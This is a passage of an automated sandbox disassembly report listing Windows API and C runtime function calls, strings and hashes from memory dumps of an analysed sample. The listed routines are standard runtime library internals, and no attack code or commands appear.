                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog3std::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1590901807-0
                    • Opcode ID: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction ID: 431628cee26a869a0e2ec7335da9ebefdd97e0da867653478fe1d8cb4fc1c38c
                    • Opcode Fuzzy Hash: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction Fuzzy Hash: 3581B571E002189FDF34DFA5C9A1BAEB7B4AF15314F24445BD802AB382D774B94ACB51
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00465720,00000FA0,?,?,0041D117), ref: 0041D145
                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041D117), ref: 0041D150
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041D117), ref: 0041D161
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D173
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D181
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041D117), ref: 0041D1A4
                    • ___scrt_fastfail.LIBCMT ref: 0041D1B5
                    • DeleteCriticalSection.KERNEL32(00465720,00000007,?,?,0041D117), ref: 0041D1C0
                    • CloseHandle.KERNEL32(00000000,?,?,0041D117), ref: 0041D1D0
                    Strings
                    • SleepConditionVariableCS, xrefs: 0041D16D
                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D14B
                    • WakeAllConditionVariable, xrefs: 0041D179
                    • kernel32.dll, xrefs: 0041D15C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 3578986977-3242537097
                    • Opcode ID: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction ID: 252a5c44d21d70e961eeb017c792f98daaed356a7d9fc3a6fd8a800735b4e431
                    • Opcode Fuzzy Hash: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction Fuzzy Hash: 82011275A40B11ABD6211B75BC0DB9B3668DB40BA3F540436FD05D23A5EAB9C840CA6E
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 044F2A58
                      • Part of subcall function 044F2856: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F2879
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 044F2A79
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 044F2A86
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 044F2AD4
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 044F2B5B
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 044F2B6E
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 044F2BBB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction ID: bdafe461976024d6980797063263e496a50a880cd7f970763a85465995fb1992
                    • Opcode Fuzzy Hash: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction Fuzzy Hash: 71817A34900249ABEF169F94CD40BBF7B71BF45308F0400DAEE506B292D7B3A956DB61
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004327F1
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432812
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0043281F
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043286D
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004328F4
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00432907
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432954
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction ID: 3f1873845dbcbd1064d3a19cd28863eec2e57fe1390348ff4fb73f67cee00bd1
                    • Opcode Fuzzy Hash: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction Fuzzy Hash: 3F81B234900249ABDF1AEF95CA41BBF7B71AF09308F04509AEC407B352C7BA8D15DB69
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044E485C
                    • ListArray.LIBCONCRT ref: 044E48AF
                      • Part of subcall function 044E4690: RtlInitializeSListHead.NTDLL(?), ref: 044E475C
                      • Part of subcall function 044E4690: RtlInitializeSListHead.NTDLL(?), ref: 044E4766
                    • ListArray.LIBCONCRT ref: 044E48E3
                    • Hash.LIBCMT ref: 044E494C
                    • Hash.LIBCMT ref: 044E495C
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E49F1
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E49FE
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E4A0B
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E4A18
                      • Part of subcall function 044E9FB8: std::bad_exception::bad_exception.LIBCMT ref: 044E9FDA
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427B25,?,000000FF,00000000), ref: 044E4AA0
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 044E4AC2
                    • GetLastError.KERNEL32(044E5802,?,?,00000000,?,?), ref: 044E4AD4
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 044E4AF1
                      • Part of subcall function 044DFF21: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,044E5802,00000008,?,044E4AF6,?,00000000,00427B16,?,7FFFFFFF,7FFFFFFF,00000000), ref: 044DFF39
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044E4B1B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID:
                    • API String ID: 1224710184-0
                    • Opcode ID: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction ID: 5acd6274126368684077a89ae294068d52061f0915fc0276fbbd157865673efc
                    • Opcode Fuzzy Hash: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction Fuzzy Hash: 75814FB0A11A12FAEB14DF76C844BE9FBA8BF08705F00421FE52997281DBB4B554CBD1
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 044E2BB8
                      • Part of subcall function 044E3EA3: GetVersionExW.KERNEL32(?), ref: 044E3EC7
                      • Part of subcall function 044E3EA3: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 044E3F66
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044E2BCC
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044E2BED
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E2C56
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E2C8A
                      • Part of subcall function 044E0B64: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 044E0B84
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044E2D0A
                      • Part of subcall function 044E26D3: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 044E26E7
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 044E2D52
                      • Part of subcall function 044E0B39: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E0B55
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 044E2D66
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 044E2D77
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044E2DC4
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044E2DE9
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 044E2DF5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction ID: 4b95f79132a2678dbce4884dd7d0928f139ca466e2f31379d8b5a959242d2a80
                    • Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction Fuzzy Hash: 90819D31A005268FDF18DFABD8909BEB7B9BB48306B5441BFD442A7740E7F0A941CB85
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00422951
                      • Part of subcall function 00423C3C: GetVersionExW.KERNEL32(?), ref: 00423C60
                      • Part of subcall function 00423C3C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423CFF
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422965
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422986
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004229EF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422A23
                      • Part of subcall function 004208FD: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042091D
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422AA3
                      • Part of subcall function 0042246C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422480
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AEB
                      • Part of subcall function 004208D2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004208EE
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AFF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422B10
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422B5D
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422B82
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction ID: 3497a36c357a9217bd5ea5df72823c379328e9b881d8ed218cbe5642490ce89b
                    • Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction Fuzzy Hash: 4881C431B00626ABCB18DFA9EA9057EBBF1BB48304B94413FD441A7751EBF86941CB4D
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0043F446
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043EFFC
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F00E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F020
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F032
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F044
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F056
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F068
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F07A
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F08C
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F09E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0B0
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0C2
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0D4
                    • _free.LIBCMT ref: 0043F43B
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F45D
                    • _free.LIBCMT ref: 0043F472
                    • _free.LIBCMT ref: 0043F47D
                    • _free.LIBCMT ref: 0043F49F
                    • _free.LIBCMT ref: 0043F4B2
                    • _free.LIBCMT ref: 0043F4C0
                    • _free.LIBCMT ref: 0043F4CB
                    • _free.LIBCMT ref: 0043F503
                    • _free.LIBCMT ref: 0043F50A
                    • _free.LIBCMT ref: 0043F527
                    • _free.LIBCMT ref: 0043F53F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: dbd078dc2a70aa704cf8e78683bcdcdf520610d7d758412ab309d08eef7ce9b5
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: FC318271940300AFDB219A39D806B5773E5AF18314F14642FE094DB292DF3CEC588B29
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004354B1
                    • type_info::operator==.LIBVCRUNTIME ref: 004354D8
                    • ___TypeMatch.LIBVCRUNTIME ref: 004355E4
                    • CatchIt.LIBVCRUNTIME ref: 00435639
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004356BF
                    • _UnwindNestedFrames.LIBCMT ref: 00435746
                    • CallUnexpected.LIBVCRUNTIME ref: 00435761
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm$$5
                    • API String ID: 4234981820-3170930526
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 2765267077130b143c7d318870dfd271b72c56ee2a1170d1c4f92d41ddd0a8a9
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 02C19E71800A09EFCF29DFA5C8819AEBBB5BF18315F54505BE8156B301C339EA51CF99
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423CF6), ref: 0041FB8F
                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FB9D
                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FBAB
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FBD9
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FBF4
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FC00
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FC16
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                    • API String ID: 1654681794-465693683
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: 2faeb71938919a1c0d9ecc2d1d00a42f8f566497dce8370ae698b9c1d05c50ed
                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: DA01C879604321AF97002BB9BC49FEB36ACA904716720043BF901D1293FE7CD849976C
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044F5718
                    • type_info::operator==.LIBVCRUNTIME ref: 044F573F
                    • ___TypeMatch.LIBVCRUNTIME ref: 044F584B
                    • CatchIt.LIBVCRUNTIME ref: 044F58A0
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044F5926
                    • _UnwindNestedFrames.LIBCMT ref: 044F59AD
                    • CallUnexpected.LIBVCRUNTIME ref: 044F59C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 4234981820-393685449
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 0873f9aa0d961ecb26d42811d12a6ed10da543ec0d5eb94e473432344c165ae3
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 18C16971900209EFDF29DFA5CC80AAEBBB5AF04325F04455BEA15AB613D331E961CF91
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 044F2CF7
                      • Part of subcall function 044F2856: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F2879
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 044F2D18
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 044F2D25
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 044F2D73
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 044F2E1B
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 044F2E4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: 8599192e05db3774e8ed71f114933a526e4f2d78e22d82021a90c133ee6f415b
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: D8719F70900249ABEF15CF54CD80ABF7BB5BF45308F04409AEE516B392C7B7A916DB61
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432A90
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432AB1
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432ABE
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00432B0C
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432BB4
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432BE6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: 5e49a0710176f9ffb610bd551467bf7c1da036f6e9237cc3336f808c64588d21
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: 99719030900209ABDF15DF54DA41ABFBBB2AF49304F04609AEC416B352C7B9DD16DB69
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EEDF1
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 044EEE0A
                    • Concurrency::location::_Assign.LIBCMT ref: 044EEE20
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 044EEE8D
                    • Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 044EEE95
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044EEEBC
                    • Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 044EEEC8
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 044EEF00
                    • Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 044EEF1F
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 044EEF2D
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 044EEF54
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
                    • String ID:
                    • API String ID: 3608406545-0
                    • Opcode ID: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction ID: 38412557e607bad89b578066e25817cfe9d7c6ae2eeabce4698f2ce9e294d7e0
                    • Opcode Fuzzy Hash: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction Fuzzy Hash: 235161347002049FEF14EF6AC485BB977A5EF49316F2544AAED499B387CB70B8058BA1
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044E6D96
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044E6DC8
                    • List.LIBCONCRT ref: 044E6E03
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044E6E14
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044E6E30
                    • List.LIBCONCRT ref: 044E6E6B
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044E6E7C
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044E6E97
                    • List.LIBCONCRT ref: 044E6ED2
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044E6EDF
                      • Part of subcall function 044E6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044E626E
                      • Part of subcall function 044E6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044E6280
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 5c67d7d1d9c5343e1979e255585ff62b89e27ba7486ac471fbc1c7b5f45e65ea
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: C8514E71A00219AFEF14DF56C494BFEB7A8BF18309F85406AD905AB381DB70BE05CB90
                    APIs
